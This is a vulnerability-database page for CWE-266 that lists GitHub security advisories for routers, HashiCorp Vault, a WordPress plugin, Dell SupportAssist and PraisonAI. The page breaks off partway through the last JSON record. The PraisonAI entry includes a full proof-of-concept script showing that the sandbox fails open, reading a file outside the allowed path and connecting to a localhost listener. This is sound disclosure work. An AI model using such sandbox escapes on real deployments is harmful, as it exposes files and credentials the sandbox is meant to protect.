Common Weakness Enumeration

CWE-266

Allowed

Incorrect Privilege Assignment

Abstraction: Base · Status: Draft

A product incorrectly assigns a privilege to a particular actor, creating an unintended sphere of control for that actor.

1913 vulnerabilities reference this CWE, most recent first.

GHSA-6GGG-VQM9-W733

Vulnerability from github – Published: 2026-03-16 15:30 – Updated: 2026-03-16 15:30
VLAI
Details

A vulnerability was identified in D-Link DIR-816 1.10CNB05. The impacted element is an unknown function of the file redirect.asp of the component goahead. The manipulation of the argument token_id leads to improper access controls. The attack may be initiated remotely. The exploit is publicly available and might be used. This vulnerability only affects products that are no longer supported by the maintainer.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-4180"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-266"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-03-16T14:19:58Z",
    "severity": "MODERATE"
  },
  "details": "A vulnerability was identified in D-Link DIR-816 1.10CNB05. The impacted element is an unknown function of the file redirect.asp of the component goahead. The manipulation of the argument token_id leads to improper access controls. The attack may be initiated remotely. The exploit is publicly available and might be used. This vulnerability only affects products that are no longer supported by the maintainer.",
  "id": "GHSA-6ggg-vqm9-w733",
  "modified": "2026-03-16T15:30:45Z",
  "published": "2026-03-16T15:30:45Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4180"
    },
    {
      "type": "WEB",
      "url": "https://github.com/wudipjq/my_vuln/blob/main/D-Link7/vuln_84/84.md"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?ctiid.351084"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?id.351084"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?submit.769828"
    },
    {
      "type": "WEB",
      "url": "https://www.dlink.com"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-6H4P-M86H-HHGH

Vulnerability from github – Published: 2025-08-01 18:31 – Updated: 2025-08-01 21:08
VLAI
Summary
Hashicorp Vault has Privilege Escalation Vulnerability
Details

A privileged Vault operator with write permissions to the root namespace’s identity endpoint could escalate their own or another user’s token privileges to Vault’s root policy. Fixed in Vault Community Edition 1.20.0 and Vault Enterprise 1.20.0, 1.19.6, 1.18.11 and 1.16.22.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/hashicorp/vault"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.10.4"
            },
            {
              "fixed": "1.20.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-5999"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-266"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-08-01T21:08:00Z",
    "nvd_published_at": "2025-08-01T18:15:56Z",
    "severity": "HIGH"
  },
  "details": "A privileged Vault operator with write permissions to the root namespace\u2019s identity endpoint could escalate their own or another user\u2019s token privileges to Vault\u2019s root policy. Fixed in Vault Community Edition 1.20.0 and Vault Enterprise 1.20.0, 1.19.6, 1.18.11 and 1.16.22.",
  "id": "GHSA-6h4p-m86h-hhgh",
  "modified": "2025-08-01T21:08:01Z",
  "published": "2025-08-01T18:31:19Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-5999"
    },
    {
      "type": "WEB",
      "url": "https://discuss.hashicorp.com/t/hcsec-2025-13-vault-root-namespace-operator-may-elevate-token-privileges/76032"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/hashicorp/vault"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Hashicorp Vault has Privilege Escalation Vulnerability"
}

GHSA-6HH3-55PQ-PGWQ

Vulnerability from github – Published: 2026-01-22 18:30 – Updated: 2026-01-27 00:31
VLAI
Details

Incorrect Privilege Assignment vulnerability in e-plugins Final User final-user allows Privilege Escalation.This issue affects Final User: from n/a through <= 1.2.5.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-69293"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-266"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-01-22T17:16:26Z",
    "severity": "HIGH"
  },
  "details": "Incorrect Privilege Assignment vulnerability in e-plugins Final User final-user allows Privilege Escalation.This issue affects Final User: from n/a through \u003c= 1.2.5.",
  "id": "GHSA-6hh3-55pq-pgwq",
  "modified": "2026-01-27T00:31:12Z",
  "published": "2026-01-22T18:30:39Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69293"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/Wordpress/Plugin/final-user/vulnerability/wordpress-final-user-plugin-1-2-5-privilege-escalation-vulnerability?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-6HR3-G9R2-994Q

Vulnerability from github – Published: 2025-08-14 15:30 – Updated: 2025-08-14 15:30
VLAI
Details

SupportAssist for Home PCs versions 4.6.3 and prior and SupportAssist for Business PCs versions 4.5.3 and prior, contain(s) an Incorrect Privilege Assignment vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to unauthorized access.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-36613"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-266"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-08-14T15:15:33Z",
    "severity": "LOW"
  },
  "details": "SupportAssist for Home PCs versions 4.6.3 and prior and SupportAssist for Business PCs versions 4.5.3 and prior, contain(s) an Incorrect Privilege Assignment vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to unauthorized access.",
  "id": "GHSA-6hr3-g9r2-994q",
  "modified": "2025-08-14T15:30:45Z",
  "published": "2025-08-14T15:30:45Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-36613"
    },
    {
      "type": "WEB",
      "url": "https://www.dell.com/support/kbdoc/en-us/000356690/dsa-2025-296-security-update-for-dell-supportassist-for-home-pcs-and-dell-supportassist-for-business-pcs-vulnerabilities"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-6J3F-9RWJ-WX28

Vulnerability from github – Published: 2026-04-27 09:34 – Updated: 2026-04-27 09:34
VLAI
Details

A vulnerability has been found in code-projects Invoice System in Laravel 1.0. Affected is an unknown function of the file /profile/ of the component Profile Handler. Such manipulation of the argument ID leads to improper authorization. The attack can be executed remotely. The exploit has been disclosed to the public and may be used.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-7092"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-266"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-04-27T07:16:04Z",
    "severity": "MODERATE"
  },
  "details": "A vulnerability has been found in code-projects Invoice System in Laravel 1.0. Affected is an unknown function of the file /profile/ of the component Profile Handler. Such manipulation of the argument ID leads to improper authorization. The attack can be executed remotely. The exploit has been disclosed to the public and may be used.",
  "id": "GHSA-6j3f-9rwj-wx28",
  "modified": "2026-04-27T09:34:38Z",
  "published": "2026-04-27T09:34:38Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-7092"
    },
    {
      "type": "WEB",
      "url": "https://code-projects.org"
    },
    {
      "type": "WEB",
      "url": "https://gist.github.com/higordiego/9b5f076d7f651e45c0f30ae14bab3b4e"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/submit/800388"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/vuln/359667"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/vuln/359667/cti"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-6J5R-7FC4-Q42H

Vulnerability from github – Published: 2026-04-05 00:30 – Updated: 2026-04-05 00:30
VLAI
Details

A security flaw has been discovered in Tenda 4G03 Pro up to 1.0/1.1/04.03.01.53/192.168.0.1. Affected by this vulnerability is an unknown functionality of the file /bin/httpd. The manipulation results in improper access controls. The attack may be performed from remote. The exploit has been released to the public and may be used for attacks.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-5526"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-266"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-04-04T23:16:44Z",
    "severity": "MODERATE"
  },
  "details": "A security flaw has been discovered in Tenda 4G03 Pro up to 1.0/1.1/04.03.01.53/192.168.0.1. Affected by this vulnerability is an unknown functionality of the file /bin/httpd. The manipulation results in improper access controls. The attack may be performed from remote. The exploit has been released to the public and may be used for attacks.",
  "id": "GHSA-6j5r-7fc4-q42h",
  "modified": "2026-04-05T00:30:23Z",
  "published": "2026-04-05T00:30:23Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5526"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/submit/782052"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/vuln/355279"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/vuln/355279/cti"
    },
    {
      "type": "WEB",
      "url": "https://www.tenda.com.cn"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-6JCQ-6546-QRRW

Vulnerability from github – Published: 2026-06-18 14:27 – Updated: 2026-06-18 14:27
VLAI
Summary
PraisonAI SandlockSandbox falls back to unrestricted subprocess execution when Landlock is unavailable
Details

Summary

praisonai.sandbox.SandlockSandbox is documented and implemented as the kernel-enforced sandbox backend for untrusted code. Its SandboxConfig.native() path lets callers configure allowed filesystem paths and network=False.

On systems where the optional sandlock module imports but reports that Landlock is unavailable, SandlockSandbox.execute() and run_command() do not fail closed. They silently fall back to SubprocessSandbox(self.config).

That fallback keeps the same high-level native policy object but does not enforce the native filesystem or network boundary during code execution. A sandboxed payload can read files outside the configured allowed path and open network connections despite network=False.

Technical Details

SandboxConfig.native() creates a restricted native policy and records caller-provided writable paths plus the requested network posture:

return cls(
    sandbox_type="native",
    working_dir=os.getcwd(),
    security_policy=SecurityPolicy(
        allow_network=network,
        allow_file_write=True,
        allow_subprocess=True,
        allowed_paths=resolved_paths,
    ),
    metadata={"writable_paths": resolved_paths, "network": network},
)

SandlockSandbox builds the intended kernel policy with Landlock-backed filesystem allowlisting and network denial:

policy = Policy(
    fs_readable=allowed_read_paths,
    fs_writable=allowed_write_paths,
    net_allow_hosts=[] if not limits.network_enabled else None,
    max_memory=f"{limits.memory_mb}M",
    max_processes=limits.max_processes,
    max_open_files=limits.max_open_files,
)

However, both execution paths fail open when Sandlock is unavailable:

if not self.is_available:
    logger.warning("Sandlock not available, falling back to subprocess")
    from .subprocess import SubprocessSandbox
    fallback = SubprocessSandbox(self.config)
    return await fallback.execute(code, language, limits, env, working_dir)

SubprocessSandbox.execute() writes the code to a temp file and runs python with a minimal environment and POSIX rlimits. It does not install a filesystem sandbox, network namespace, syscall filter, chroot, Landlock policy, or path allowlist for the code execution path. The safe_sandbox_path() checks only protect the read_file(), write_file(), and list_files() helper methods.

Why This Is Not Intended Behavior

The report is not based only on a trust-model disagreement. The code and docs define a concrete boundary:

  • PraisonAI's Sandlock README says the backend provides kernel-level filesystem allowlisting, network isolation, seccomp filtering, and blocks /etc/passwd, SSH keys, AWS credentials, and unauthorized connections.
  • The security demo creates SandboxConfig.native(writable_paths=["./safe_workspace"], network=False) and labels file and network access as blocked operations.
  • The upstream sandlock package requires Linux with a compatible Landlock ABI and documents a fail-closed default for missing required protections unless the caller explicitly opts into degraded protection.
  • PraisonAI's own current security page recommends sandboxed execution and says path traversal protection is enabled by default for local sandbox backends.

The bug is the silent fallback from an unavailable kernel-enforced boundary to plain subprocess execution without preserving the configured native policy.

PoV

Run from a PraisonAI source checkout:

python3 poc/pov_poc.py \
  --repo /path/to/PraisonAI

The PoV:

  1. injects a fake sandlock module that imports successfully but reports no usable Landlock support;
  2. configures SandboxConfig.native(writable_paths=[tenant_a], network=False);
  3. creates tenant-b-secret.txt outside the configured path;
  4. starts a localhost TCP listener;
  5. executes code through SandlockSandbox.execute().

Observed result on v4.6.58:

{
  "child_output": {
    "network_reply": "local-ok",
    "outside_read": "TENANT_B_CANARY"
  },
  "configured_network": false,
  "outside_path_under_allowed": false,
  "sandlock_available": false,
  "sandbox_type": "sandlock",
  "status": "COMPLETED",
  "vulnerable": true
}

This proves both policy boundaries are crossed:

  • the file read target is not under the configured allowed path;
  • the localhost network connection succeeds even though the native policy was created with network=False.

Full PoV script:

#!/usr/bin/env python3
"""Local-only PoV for poc.

The PoV simulates a system where the optional ``sandlock`` Python package is
installed but kernel Landlock support is unavailable. That is the exact branch
handled by ``SandlockSandbox.execute()``: it logs a warning and falls back to
``SubprocessSandbox``.

No external network is used. The network control is a localhost TCP listener.
No sensitive host files are read. The filesystem control uses temporary tenant
directories and a canary file outside the configured writable path.
"""

from __future__ import annotations

import argparse
import asyncio
import contextlib
import json
import os
import pathlib
import socket
import sys
import tempfile
import types
from typing import Any

def _repo_paths(repo: pathlib.Path) -> list[str]:
    return [
        str(repo / "src" / "praisonai"),
        str(repo / "src" / "praisonai-agents"),
    ]

async def _accept_once(server: socket.socket) -> str | None:
    loop = asyncio.get_running_loop()

    def accept() -> str:
        conn, _ = server.accept()
        with conn:
            data = conn.recv(128)
            conn.sendall(b"local-ok")
        return data.decode("utf-8", "replace")

    with contextlib.suppress(Exception):
        return await loop.run_in_executor(None, accept)
    return None

async def run_pov(repo: pathlib.Path) -> dict[str, Any]:
    sandlock_path = repo / "src" / "praisonai" / "praisonai" / "sandbox" / "sandlock.py"
    if not sandlock_path.exists():
        return {"repo": str(repo), "has_sandlock": False, "vulnerable": False}

    sys.path[:0] = _repo_paths(repo)

    # Support both the original v4.5.110 API check and the current v4.6.58 API
    # check while forcing the "Sandlock not available" branch.
    sys.modules["sandlock"] = types.SimpleNamespace(
        is_available=lambda: False,
        landlock_abi_version=lambda: 0,
    )

    from praisonai.sandbox.sandlock import SandlockSandbox
    from praisonaiagents.sandbox import ResourceLimits, SandboxConfig

    with tempfile.TemporaryDirectory(prefix="poc-") as temp_root:
        base = pathlib.Path(temp_root)

        # Make the PoV deterministic on systems where "python" is not on PATH.
        bindir = base / "bin"
        bindir.mkdir()
        (bindir / "python").symlink_to(sys.executable)

        allowed = base / "tenant-a"
        allowed.mkdir()
        outside = base / "tenant-b-secret.txt"
        outside.write_text("TENANT_B_CANARY", encoding="utf-8")

        server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        server.bind(("127.0.0.1", 0))
        server.listen(1)
        server.settimeout(5)
        port = server.getsockname()[1]

        config = SandboxConfig.native(writable_paths=[str(allowed)], network=False)
        sandbox = SandlockSandbox(config=config)
        await sandbox.start()

        code = f"""
import json
import socket

result = {{}}

try:
    with open({str(outside)!r}, "r") as f:
        result["outside_read"] = f.read()
except Exception as exc:
    result["outside_read_error"] = type(exc).__name__ + ": " + str(exc)

try:
    s = socket.create_connection(("127.0.0.1", {port}), timeout=3)
    s.sendall(b"hello")
    result["network_reply"] = s.recv(32).decode("utf-8", "replace")
    s.close()
except Exception as exc:
    result["network_error"] = type(exc).__name__ + ": " + str(exc)

print(json.dumps(result, sort_keys=True))
"""

        accept_task = asyncio.create_task(_accept_once(server))
        result = await sandbox.execute(
            code,
            limits=ResourceLimits(
                timeout_seconds=10,
                memory_mb=512,
                max_processes=10,
                max_open_files=64,
                network_enabled=False,
            ),
            env={"PATH": str(bindir)},
        )

        accepted_payload = None
        with contextlib.suppress(Exception):
            accepted_payload = await accept_task

        server.close()
        await sandbox.stop()

        child_output: dict[str, Any] = {}
        with contextlib.suppress(Exception):
            child_output = json.loads(result.stdout.strip())

        vulnerable = (
            child_output.get("outside_read") == "TENANT_B_CANARY"
            and child_output.get("network_reply") == "local-ok"
        )

        return {
            "repo": str(repo),
            "has_sandlock": True,
            "sandbox_type": sandbox.sandbox_type,
            "sandlock_available": sandbox.is_available,
            "configured_allowed_paths": config.security_policy.allowed_paths,
            "configured_network": config.security_policy.allow_network,
            "outside_path_under_allowed": str(outside).startswith(str(allowed) + os.sep),
            "status": getattr(result.status, "name", str(result.status)),
            "exit_code": result.exit_code,
            "stdout": result.stdout.strip(),
            "stderr": result.stderr.strip(),
            "error": result.error,
            "child_output": child_output,
            "accepted_local_payload": accepted_payload,
            "vulnerable": vulnerable,
        }

def main() -> int:
    parser = argparse.ArgumentParser()
    parser.add_argument("--repo", required=True, type=pathlib.Path)
    args = parser.parse_args()

    result = asyncio.run(run_pov(args.repo.resolve()))
    print(json.dumps(result, indent=2, sort_keys=True))

    if result.get("has_sandlock") and not result.get("vulnerable"):
        return 1
    return 0

if __name__ == "__main__":
    raise SystemExit(main())

PoC

The PoV section above contains the local reproduction command, input, and decisive output.

Impact

If a PraisonAI user or service relies on SandlockSandbox / native sandboxing for untrusted code isolation on a host without the required Landlock support, code submitted to the sandbox can execute with the host user's normal filesystem and network access.

Concrete impact includes:

  • reading files outside the configured tenant/workspace path;
  • reading project files, credentials, .env files, SSH material, or cloud config reachable by the PraisonAI process user;
  • connecting to loopback or internal services despite network=False;
  • moving from sandboxed code execution to unsandboxed host-user code execution in deployments that treat Sandlock as the isolation boundary.

The local PoV does not read real sensitive files or contact external systems. It uses temporary tenant directories and a localhost TCP listener.

Suggested Fix

Fail closed when the requested native sandbox boundary cannot be enforced.

Recommended changes:

  1. In SandlockSandbox.execute() and run_command(), return a failed SandboxResult or raise a clear runtime error when self.is_available is false.
  2. If fallback behavior is kept for developer convenience, require an explicit opt-in such as allow_degraded=True or fallback="subprocess" and surface that degraded state in the result metadata.
  3. Do not preserve sandbox_type == "sandlock" in status metadata when the actual execution backend is subprocess.
  4. Add regression tests proving that unavailable Landlock does not execute code unless degraded fallback was explicitly requested.
  5. Add tests that a native policy with network=False and a restricted path cannot read outside-path canaries or connect to a localhost listener.
  6. Document the required kernel/ABI versions and the exact degraded-mode semantics.

Affected Package/Versions

  • Repository: MervinPraison/PraisonAI
  • Package: praisonai
  • Component: src/praisonai/praisonai/sandbox/sandlock.py
  • Related config component: src/praisonai-agents/praisonaiagents/sandbox/config.py
  • Latest verified release/current head: v4.6.58, 1ad58ca02975ff1398efeda694ea2ab78f20cf3e

Confirmed affected:

v4.5.110  vulnerable
v4.5.120  vulnerable
v4.6.58   vulnerable
current   vulnerable

Negative control:

v4.5.109  not affected because SandlockSandbox is absent

Suggested affected range: >= 4.5.110, <= 4.6.58.

No fixed version is known at submission time.

Version Sweep

version              has_sandlock  sandlock_available  status     outside_read     network_reply  vulnerable
praisonai-v4.5.109   false                                               false
praisonai-v4.5.110   true          false               COMPLETED  TENANT_B_CANARY  local-ok       true
praisonai-v4.6.58    true          false               COMPLETED  TENANT_B_CANARY  local-ok       true
praisonai-current    true          false               COMPLETED  TENANT_B_CANARY  local-ok       true

GitHub history for sandlock.py shows the backend was introduced in 4ee7d298c89f on 2026-04-01 with "graceful fallback to SubprocessSandbox", then updated in 7ae6c6d19c31 on 2026-04-02 to use the current Landlock ABI check.

Advisory History

Nearby advisories are distinct:

  • GHSA-r4f2-3m54-pp7q / CVE-2026-34955: SubprocessSandbox shell command escape through 4.5.96.
  • GHSA-4mr5-g6f9-cfrh, GHSA-qf73-2hrx-xprp, GHSA-6vh2-h83c-9294: execute_code() Python sandbox escapes.
  • GHSA-ch89-h4r2-c8f8: agent tools workspace escape via symlinks.
  • GHSA-gcq3-mfvh-3x25: PraisonAI Code agent tool workspace fail-open.

This report covers a different root cause: SandlockSandbox / native sandbox policy downgrade when Landlock is unavailable. It reproduces on the latest release v4.6.58, while the older SubprocessSandbox shell escape advisory was fixed at 4.5.97.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "praisonai"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.5.110"
            },
            {
              "fixed": "4.6.61"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-266",
      "CWE-668",
      "CWE-693"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-18T14:27:19Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "## Summary\n\n`praisonai.sandbox.SandlockSandbox` is documented and implemented as the kernel-enforced sandbox backend for untrusted code. Its `SandboxConfig.native()` path lets callers configure allowed filesystem paths and `network=False`.\n\nOn systems where the optional `sandlock` module imports but reports that Landlock is unavailable, `SandlockSandbox.execute()` and `run_command()` do not fail closed. They silently fall back to `SubprocessSandbox(self.config)`.\n\nThat fallback keeps the same high-level native policy object but does not enforce the native filesystem or network boundary during code execution. A sandboxed payload can read files outside the configured allowed path and open network connections despite `network=False`.\n\n## Technical Details\n\n`SandboxConfig.native()` creates a restricted native policy and records caller-provided writable paths plus the requested network posture:\n\n```python\nreturn cls(\n    sandbox_type=\"native\",\n    working_dir=os.getcwd(),\n    security_policy=SecurityPolicy(\n        allow_network=network,\n        allow_file_write=True,\n        allow_subprocess=True,\n        allowed_paths=resolved_paths,\n    ),\n    metadata={\"writable_paths\": resolved_paths, \"network\": network},\n)\n```\n\n`SandlockSandbox` builds the intended kernel policy with Landlock-backed filesystem allowlisting and network denial:\n\n```python\npolicy = Policy(\n    fs_readable=allowed_read_paths,\n    fs_writable=allowed_write_paths,\n    net_allow_hosts=[] if not limits.network_enabled else None,\n    max_memory=f\"{limits.memory_mb}M\",\n    max_processes=limits.max_processes,\n    max_open_files=limits.max_open_files,\n)\n```\n\nHowever, both execution paths fail open when Sandlock is unavailable:\n\n```python\nif not self.is_available:\n    logger.warning(\"Sandlock not available, falling back to subprocess\")\n    from .subprocess import SubprocessSandbox\n    fallback = SubprocessSandbox(self.config)\n    return await fallback.execute(code, language, limits, env, working_dir)\n```\n\n`SubprocessSandbox.execute()` writes the code to a temp file and runs `python` with a minimal environment and POSIX rlimits. It does not install a filesystem sandbox, network namespace, syscall filter, chroot, Landlock policy, or path allowlist for the code execution path. The `safe_sandbox_path()` checks only protect the `read_file()`, `write_file()`, and `list_files()` helper methods.\n\n### Why This Is Not Intended Behavior\n\nThe report is not based only on a trust-model disagreement. The code and docs define a concrete boundary:\n\n- PraisonAI\u0027s Sandlock README says the backend provides kernel-level filesystem allowlisting, network isolation, seccomp filtering, and blocks `/etc/passwd`, SSH keys, AWS credentials, and unauthorized connections.\n- The security demo creates `SandboxConfig.native(writable_paths=[\"./safe_workspace\"], network=False)` and labels file and network access as blocked operations.\n- The upstream `sandlock` package requires Linux with a compatible Landlock ABI and documents a fail-closed default for missing required protections unless the caller explicitly opts into degraded protection.\n- PraisonAI\u0027s own current security page recommends sandboxed execution and says path traversal protection is enabled by default for local sandbox backends.\n\nThe bug is the silent fallback from an unavailable kernel-enforced boundary to plain subprocess execution without preserving the configured native policy.\n\n## PoV\n\nRun from a PraisonAI source checkout:\n\n```bash\npython3 poc/pov_poc.py \\\n  --repo /path/to/PraisonAI\n```\n\nThe PoV:\n\n1. injects a fake `sandlock` module that imports successfully but reports no usable Landlock support;\n2. configures `SandboxConfig.native(writable_paths=[tenant_a], network=False)`;\n3. creates `tenant-b-secret.txt` outside the configured path;\n4. starts a localhost TCP listener;\n5. executes code through `SandlockSandbox.execute()`.\n\nObserved result on `v4.6.58`:\n\n```json\n{\n  \"child_output\": {\n    \"network_reply\": \"local-ok\",\n    \"outside_read\": \"TENANT_B_CANARY\"\n  },\n  \"configured_network\": false,\n  \"outside_path_under_allowed\": false,\n  \"sandlock_available\": false,\n  \"sandbox_type\": \"sandlock\",\n  \"status\": \"COMPLETED\",\n  \"vulnerable\": true\n}\n```\n\nThis proves both policy boundaries are crossed:\n\n- the file read target is not under the configured allowed path;\n- the localhost network connection succeeds even though the native policy was created with `network=False`.\n\nFull PoV script:\n\n```python\n#!/usr/bin/env python3\n\"\"\"Local-only PoV for poc.\n\nThe PoV simulates a system where the optional ``sandlock`` Python package is\ninstalled but kernel Landlock support is unavailable. That is the exact branch\nhandled by ``SandlockSandbox.execute()``: it logs a warning and falls back to\n``SubprocessSandbox``.\n\nNo external network is used. The network control is a localhost TCP listener.\nNo sensitive host files are read. The filesystem control uses temporary tenant\ndirectories and a canary file outside the configured writable path.\n\"\"\"\n\nfrom __future__ import annotations\n\nimport argparse\nimport asyncio\nimport contextlib\nimport json\nimport os\nimport pathlib\nimport socket\nimport sys\nimport tempfile\nimport types\nfrom typing import Any\n\ndef _repo_paths(repo: pathlib.Path) -\u003e list[str]:\n    return [\n        str(repo / \"src\" / \"praisonai\"),\n        str(repo / \"src\" / \"praisonai-agents\"),\n    ]\n\nasync def _accept_once(server: socket.socket) -\u003e str | None:\n    loop = asyncio.get_running_loop()\n\n    def accept() -\u003e str:\n        conn, _ = server.accept()\n        with conn:\n            data = conn.recv(128)\n            conn.sendall(b\"local-ok\")\n        return data.decode(\"utf-8\", \"replace\")\n\n    with contextlib.suppress(Exception):\n        return await loop.run_in_executor(None, accept)\n    return None\n\nasync def run_pov(repo: pathlib.Path) -\u003e dict[str, Any]:\n    sandlock_path = repo / \"src\" / \"praisonai\" / \"praisonai\" / \"sandbox\" / \"sandlock.py\"\n    if not sandlock_path.exists():\n        return {\"repo\": str(repo), \"has_sandlock\": False, \"vulnerable\": False}\n\n    sys.path[:0] = _repo_paths(repo)\n\n    # Support both the original v4.5.110 API check and the current v4.6.58 API\n    # check while forcing the \"Sandlock not available\" branch.\n    sys.modules[\"sandlock\"] = types.SimpleNamespace(\n        is_available=lambda: False,\n        landlock_abi_version=lambda: 0,\n    )\n\n    from praisonai.sandbox.sandlock import SandlockSandbox\n    from praisonaiagents.sandbox import ResourceLimits, SandboxConfig\n\n    with tempfile.TemporaryDirectory(prefix=\"poc-\") as temp_root:\n        base = pathlib.Path(temp_root)\n\n        # Make the PoV deterministic on systems where \"python\" is not on PATH.\n        bindir = base / \"bin\"\n        bindir.mkdir()\n        (bindir / \"python\").symlink_to(sys.executable)\n\n        allowed = base / \"tenant-a\"\n        allowed.mkdir()\n        outside = base / \"tenant-b-secret.txt\"\n        outside.write_text(\"TENANT_B_CANARY\", encoding=\"utf-8\")\n\n        server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n        server.bind((\"127.0.0.1\", 0))\n        server.listen(1)\n        server.settimeout(5)\n        port = server.getsockname()[1]\n\n        config = SandboxConfig.native(writable_paths=[str(allowed)], network=False)\n        sandbox = SandlockSandbox(config=config)\n        await sandbox.start()\n\n        code = f\"\"\"\nimport json\nimport socket\n\nresult = {{}}\n\ntry:\n    with open({str(outside)!r}, \"r\") as f:\n        result[\"outside_read\"] = f.read()\nexcept Exception as exc:\n    result[\"outside_read_error\"] = type(exc).__name__ + \": \" + str(exc)\n\ntry:\n    s = socket.create_connection((\"127.0.0.1\", {port}), timeout=3)\n    s.sendall(b\"hello\")\n    result[\"network_reply\"] = s.recv(32).decode(\"utf-8\", \"replace\")\n    s.close()\nexcept Exception as exc:\n    result[\"network_error\"] = type(exc).__name__ + \": \" + str(exc)\n\nprint(json.dumps(result, sort_keys=True))\n\"\"\"\n\n        accept_task = asyncio.create_task(_accept_once(server))\n        result = await sandbox.execute(\n            code,\n            limits=ResourceLimits(\n                timeout_seconds=10,\n                memory_mb=512,\n                max_processes=10,\n                max_open_files=64,\n                network_enabled=False,\n            ),\n            env={\"PATH\": str(bindir)},\n        )\n\n        accepted_payload = None\n        with contextlib.suppress(Exception):\n            accepted_payload = await accept_task\n\n      